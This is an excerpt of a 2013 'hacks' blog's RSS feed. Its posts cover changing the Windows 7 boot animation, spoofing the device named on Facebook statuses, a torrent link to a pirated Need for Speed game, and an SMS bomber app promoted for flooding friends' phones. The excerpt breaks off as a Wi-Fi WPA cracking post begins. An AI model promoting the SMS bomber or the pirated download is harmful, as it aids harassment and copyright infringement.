&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAtA28N93RZ3Rxpf5IJ6t28HWiqGXMsKXE2J-mNbEvgFZkpOUcV2g8FRLNcSr7Fwf-80MADI-5TGmGhWhoL7XM5ZvaCIddyJDgRLbspuoREirumcaPqTEvNORAeHfPySmqkMuI0Fh7h1We/s1600/need_for_speed_the_run_boot_animation_by_bruellkaefer-d4jt104.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAtA28N93RZ3Rxpf5IJ6t28HWiqGXMsKXE2J-mNbEvgFZkpOUcV2g8FRLNcSr7Fwf-80MADI-5TGmGhWhoL7XM5ZvaCIddyJDgRLbspuoREirumcaPqTEvNORAeHfPySmqkMuI0Fh7h1We/s1600/need_for_speed_the_run_boot_animation_by_bruellkaefer-d4jt104.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://db.tt/g3nX6yU1" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkGJ7mKUHUUem_hcHANCausIt1DglFdrSbyU9QuL1lioTkTuTz9swGoBZCR1ejGe4DollUuhPJhD6rVy0ZFYFq2UF5sssHQO4NeIOPWBuZIrC81P1QeCdXWdShVUZfwrIHdfr9E6kEzIkc/s72-c/Win7BootUpdater.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="-1" type="application/json" url="https://db.tt/vTFF2AQB"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Hey friends are you tired from watching your old window boot screen animation . Now , I&amp;nbsp; tell you can you give your window a Funky cool new window boot screen animation . It is very simple to add some animation ,We use a software called Windows 7 Boot Updater.&amp;nbsp; &amp;nbsp;&amp;nbsp; This software makes it possible to change boot animation,as well as text background. The application works by modifying the BOOTMGR system file. Since the application is in beta version and modifies certain critical system files it is always recommended to backup before using it. Though in our testing we found that the application worked well on a Windows 7 x64 SP1 system without any problems Steps to change boot animation: Step 1: Download&amp;nbsp; Windows 7 Boot Updater&amp;nbsp; and open it. Step 2: Run the application and load boot screen file (.bs7). Step 3: Check that you have loaded correct boot screen using using play. Click ‘Apply’ to to change the boot screen. Selected boot screens for Windows 7 There are many skin in internet but few are best. 1.Radian boot screen &amp;nbsp;Download 2.Window Progress counter Download 3.Need for Speed Download</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>Hey friends are you tired from watching your old window boot screen animation . Now , I&amp;nbsp; tell you can you give your window a Funky cool new window boot screen animation . It is very simple to add some animation ,We use a software called Windows 7 Boot Updater.&amp;nbsp; &amp;nbsp;&amp;nbsp; This software makes it possible to change boot animation,as well as text background. The application works by modifying the BOOTMGR system file. Since the application is in beta version and modifies certain critical system files it is always recommended to backup before using it. Though in our testing we found that the application worked well on a Windows 7 x64 SP1 system without any problems Steps to change boot animation: Step 1: Download&amp;nbsp; Windows 7 Boot Updater&amp;nbsp; and open it. Step 2: Run the application and load boot screen file (.bs7). Step 3: Check that you have loaded correct boot screen using using play. Click ‘Apply’ to to change the boot screen. Selected boot screens for Windows 7 There are many skin in internet but few are best. 1.Radian boot screen &amp;nbsp;Download 2.Window Progress counter Download 3.Need for Speed Download</itunes:summary><itunes:keywords>Hacking</itunes:keywords></item><item><title>Update Facebook status via any device </title><link>http://bambahacks.blogspot.com/2013/11/update-facebook-status-via-any-device.html</link><category>FB Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 26 Nov 2013 02:56:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-5225046795897658192</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijOw1TO4HlKjmODNjey1W2q9niqE1dZLlEx5KTyOq_wKC1Wq6T9vw4CC_lbGR0544fp73xs4Cu7sji_8ZWtYhJL6np9ITDGSRjQAUEF9VUlA9GcVuMIpCNeEGQSq07H9ToWtZo7EGgXOw/s1600/Update+FB+Status+via+iPhone+5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijOw1TO4HlKjmODNjey1W2q9niqE1dZLlEx5KTyOq_wKC1Wq6T9vw4CC_lbGR0544fp73xs4Cu7sji_8ZWtYhJL6np9ITDGSRjQAUEF9VUlA9GcVuMIpCNeEGQSq07H9ToWtZo7EGgXOw/s320/Update+FB+Status+via+iPhone+5.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;I don't have an iPhone 5 but i can still update my fb status via iPhone 5.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;We are not a millionaire so we don't have a list of smart devices .But you think like a hacker&lt;br /&gt;
you can do it .&lt;br /&gt;
&amp;nbsp;You can show of your friend that you have a smart device ,in your fb status show via a device.When your friends see your fb status they were shocked. &lt;br /&gt;
Now you can update status via difference 
devices ranging from android phone to iPhone . From now on, no need to 
feel upset when your friend updates status from his expensive gadgets.&lt;br /&gt;
&lt;h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;CREATING A FACEBOOK APP&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;ol style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Go to &lt;span class="IL_AD" id="IL_AD1"&gt;this link&lt;/span&gt; &lt;a href="https://developers.facebook.com/"&gt;Facebook Developers&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Create your account if you don't have&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Click on Apps (The last option of the top menu beside search bar)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Now click on Create New App&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Now if you want to post your status with iPhone then type iphone in place of App Name&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Click on continue&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Now it will ask you to enter captcha. Just enter the captcha and move ahead&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLviSOq9G-KfhdcbuDRBsaQz4-eCb88gud0nGsQFHiX1uD1XaBYioxfGiJtmEPfovnmBI4C94I3dlmmLJJ90ZwADArrGa_YafJz63aGuceSQoKDb78QJk9_aq1EH5LqM1mtPfo6Y931jw/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="468" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLviSOq9G-KfhdcbuDRBsaQz4-eCb88gud0nGsQFHiX1uD1XaBYioxfGiJtmEPfovnmBI4C94I3dlmmLJJ90ZwADArrGa_YafJz63aGuceSQoKDb78QJk9_aq1EH5LqM1mtPfo6Y931jw/s640/Untitled.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;ol style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;1. &lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Fill the display name (If you want to update your status with iphone then type iphone).&amp;nbsp; &lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Enter an app domain and site url (If you don't have domain then enter what I have &lt;span class="IL_AD" id="IL_AD7"&gt;entered&lt;/span&gt; in this app)&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Sandbox mode must be disabled.&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Copy the App ID&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Save changes.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Now you will see the basic settings of the app. See the image below&lt;/span&gt;&lt;br /&gt;
&lt;h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;POSTING STATUS ON FACEBOOK WITH YOUR APP&lt;/span&gt;&lt;/h3&gt;
&lt;ol style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Copy one from these URLs&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Paste your App ID which you have copied in the red marked area.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Now your URL will be like&lt;/span&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h5&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;https://m.facebook.com/dialog/feed?app_id=429297103855432&lt;span style="color: red;"&gt;&amp;lt;place your app id&amp;gt;&lt;/span&gt;&amp;amp;redirect_uri=https%3A%2F%2Fwww.facebook.com&amp;amp;to&amp;amp;display=touch

&lt;/span&gt;&lt;/h5&gt;
&lt;/blockquote&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Open the URL with your browser and post your status.&lt;/span&gt;&lt;br /&gt;
&lt;h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;PRE CREATED URLs&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;You find more precreated app id at this site of various devices. &lt;/span&gt;&lt;br /&gt;
&lt;h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;a href="http://fbstatusvia.com/"&gt;Fbstatusvia&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&amp;nbsp;&lt;/span&gt; &lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;br /&gt;&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijOw1TO4HlKjmODNjey1W2q9niqE1dZLlEx5KTyOq_wKC1Wq6T9vw4CC_lbGR0544fp73xs4Cu7sji_8ZWtYhJL6np9ITDGSRjQAUEF9VUlA9GcVuMIpCNeEGQSq07H9ToWtZo7EGgXOw/s72-c/Update+FB+Status+via+iPhone+5.PNG" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>NEED FOR SPEED MOST WANTED</title><link>http://bambahacks.blogspot.com/2013/11/need-for-speed-most-wanted-friends-here.html</link><category>PC Game</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Thu, 21 Nov 2013 03:59:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-1956442251086705072</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"&gt;&lt;i&gt;NEED FOR SPEED MOST WANTED&lt;/i&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;h2 style="border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; font-size: 14px; line-height: normal; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
&lt;i&gt;Friends Here I Giving You NEED FOR SPEED MOST WANTED&amp;nbsp;&lt;/i&gt;&lt;i&gt;For PC This Is Ripped Or Compressed Hope You Like It&amp;nbsp;&lt;/i&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpcgBoRkwlAOHcpmKlZwFyQgA6PnJQmj6bH_ddWf2lx0luV4xipC5B-_sknBJYL9F0NcFjomMzule1lFlt_0c7Cc100vUWh8qLZwdLn0SEb8s6wRAu2dAIe8uq7N-DlkLXQzBRGhClpmFM/s1600/nfs-most-wanted-by-mjamil-on-deviantart-432831.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpcgBoRkwlAOHcpmKlZwFyQgA6PnJQmj6bH_ddWf2lx0luV4xipC5B-_sknBJYL9F0NcFjomMzule1lFlt_0c7Cc100vUWh8qLZwdLn0SEb8s6wRAu2dAIe8uq7N-DlkLXQzBRGhClpmFM/s320/nfs-most-wanted-by-mjamil-on-deviantart-432831.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;span style="font-size: medium;"&gt;NFS Most Wanted was a bang from NFS with extreme graphics and superb gameplay. The game comes with new features like destructable platforms , full customization , city roam and the best part POLICE CHASE. This game gives the most amazing car racing experience.&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h2 style="clear: left; color: #99742e; font-family: Tahoma, Verdana, Arial, Helvetica, sans-serif; font-size: 21px; font-weight: normal; line-height: normal; margin: 0px 0px 5px; outline: none; padding: 0px;"&gt;
System Requirements&lt;/h2&gt;
&lt;table class="font12px" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none;"&gt;&lt;tbody style="outline: none;"&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;CPU&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;3 Ghz or faster&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;RAM&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Atleast 1 GB&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;VGA&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Atleast an NVidia 5900 or ATi 9800 with 256mb of video memory&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;DX&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DirectX 9.0c&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;OS&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Windows XP&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;HDD&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;3 GB or more free space&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Sound&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DirectX 9.0c compatible&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Resolution&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;1280x1024&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;ODD&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DVD reader&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Network&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Multiplayer requires 1 set of discs per PC and a broadband (Cable, DSL or faster) connection. Internet or LAN (2-4 players)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Recommended peripheral&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Keyboard, Mouse or Steering Wheel/Gamepad&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Note&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;System Requirements for full detail level on 1280x1024 Note: You might be able to play on full detail level and 1280x1024 with slightly lower requirements.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; line-height: normal; outline: none;" /&gt;
&lt;h2 style="clear: left; color: #99742e; font-family: Tahoma, Verdana, Arial, Helvetica, sans-serif; font-size: 21px; font-weight: normal; line-height: normal; margin: 0px 0px 5px; outline: none; padding: 0px;"&gt;
Description&lt;/h2&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
Need for Speed Most wanted&lt;br /&gt;
&lt;br style="outline: none;" /&gt;
Minimum system requirements: Intel Pentium 4 (or equivalent) CPU running at 1.4GHz or higher, 256MB RAM, 32MB DirectX 9.0c compatible video card (Geforce2 MX or higher)*, DirectX compatible sound card, 3 GB of HD space, 8X CD-ROM&lt;br /&gt;
&lt;br style="outline: none;" /&gt;
* The following major D3D chipsets are supported: ATI Radeon 7500, 8500, 9xxx series, Xpress 200, X300, X600, X700, X800 series, NVIDIA GeForce 2 (GTS, MX, Ultra/Ti), GeForce 3 (Ti), GeForce 4 (MX, Ti), GeForce FX series, GeForce 6200, 6600, 6800, 7800, Intel 950/i915g, S3 GammaChrome S18 Pro.&lt;br /&gt;
&lt;br style="outline: none;" /&gt;
Instructions&lt;br /&gt;
&lt;br style="outline: none;" /&gt;
1. Extract all the 4 parts&lt;br /&gt;
2. Run .7z File&lt;br /&gt;
3. Just run the game icon&lt;br /&gt;
4. Enjoy&lt;br /&gt;
&lt;br style="outline: none;" /&gt;
Works 100%.....Guaranteed&lt;br /&gt;
&lt;br style="outline: none;" /&gt;
No need for crack or keygen&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;TO DOWNLOAD THIS GAME YOU HAVE TO INSTALL BIT TORRENT TO YOUR PC&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;DOWNLOAD LINK IS BELOW&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;&lt;a href="http://torcache.net/torrent/28CB58B78064499252AF7F63F99595ED14079805.torrent?title=[kickass.to]need.for.speed.most.wanted.full.compressed.pc" target="_blank"&gt;Need For Speed Most Wanted (Highly Compressed)&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpcgBoRkwlAOHcpmKlZwFyQgA6PnJQmj6bH_ddWf2lx0luV4xipC5B-_sknBJYL9F0NcFjomMzule1lFlt_0c7Cc100vUWh8qLZwdLn0SEb8s6wRAu2dAIe8uq7N-DlkLXQzBRGhClpmFM/s72-c/nfs-most-wanted-by-mjamil-on-deviantart-432831.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>SMS Bombing </title><link>http://bambahacks.blogspot.com/2013/11/sms-bombing.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 19 Nov 2013 21:20:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-4832519389002283857</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&amp;nbsp; Now days you wanna Kick-ass your friend .So this app is ready for it&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;SMS Bomber&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&amp;nbsp;An SMS bomber is exactly what it sounds like. It  is similar to an email bomber except it spams with different things ie  SMS's instead of emails. SMS bombers are a lot more trouble than email  bombers because they can be used to target phones&lt;br /&gt;&amp;nbsp; Bomb your friends with alot of SMS&lt;strong&gt; in a short period&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhZbUUFwULYZL-nTjNo7ITIWJU9-9qz_9X10kb2C_Gflkcy3GIT49YSEV8vhTzUG_LeSlZn33SnxuiYnLZcW0JBu2wnoL01ak7S9hRmu6zpC1xzjGbw9XR8OqDw47jzHhWgfC64ohZjrB/s1600/Screenshot_2013-11-20-10-43-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhZbUUFwULYZL-nTjNo7ITIWJU9-9qz_9X10kb2C_Gflkcy3GIT49YSEV8vhTzUG_LeSlZn33SnxuiYnLZcW0JBu2wnoL01ak7S9hRmu6zpC1xzjGbw9XR8OqDw47jzHhWgfC64ohZjrB/s1600/Screenshot_2013-11-20-10-43-42.png" height="320" width="192" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4 style="text-align: left;"&gt;&lt;a href="https://www.blogger.com/null" name="Features"&gt;&lt;/a&gt;Features&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;- Unlimit number of text &lt;/li&gt;&lt;li&gt;- Flood multiple contacts &lt;/li&gt;&lt;li&gt;- Cancel button &lt;/li&gt;&lt;li&gt;- No delay or periodically send &lt;/li&gt;&lt;li&gt;- Remember last config &lt;/li&gt;&lt;li&gt;- Easily select contacts &lt;/li&gt;&lt;li&gt;- Counter to make sms differently &lt;/li&gt;&lt;li&gt;- Add counter to (press menu/Counter) into each text&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="font-weight: normal;"&gt;&lt;a href="http://code.google.com/p/sms-bomber/" target="_blank"&gt;Download&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/h4&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="color: lime;"&gt;&lt;span style="font-size: large;"&gt;Anti SMS Bomber&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;Anti SMS Bomber helps you prevent repeated message from any sender. Turn it on and stay safe.&lt;br /&gt;&lt;br /&gt;&lt;h4 style="text-align: left;"&gt;Features:&lt;/h4&gt;&lt;div style="text-align: left;"&gt;- Block duplicated sms from any sender&lt;br /&gt;- See log messages&lt;br /&gt;- Fix empty message bug&lt;br /&gt;- Show notification when being bombed &lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;i&gt;&lt;b&gt;&lt;a href="http://xdroidx.googlecode.com/files/antibomber-1.apk" target="_blank"&gt;Download&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhZbUUFwULYZL-nTjNo7ITIWJU9-9qz_9X10kb2C_Gflkcy3GIT49YSEV8vhTzUG_LeSlZn33SnxuiYnLZcW0JBu2wnoL01ak7S9hRmu6zpC1xzjGbw9XR8OqDw47jzHhWgfC64ohZjrB/s72-c/Screenshot_2013-11-20-10-43-42.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How To Hack Wi-Fi WPA/WPA2 Password  &amp;amp; Secure your Wi-Fi</title><link>http://bambahacks.blogspot.com/2013/11/how-to-hack-wi-fi-wpawpa2-password.html</link><category>Wi-Fi Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 19 Nov 2013 03:17:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-7400309911705820927</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div&gt;&amp;nbsp;Warning:::::::Don't hack any&amp;nbsp; authorized wifi otherwise you go to jail.&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-size: large;"&gt;Hack Wifi&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style="text-align: justify;"&gt;&amp;nbsp;Tools&lt;/h3&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;h3 style="text-align: 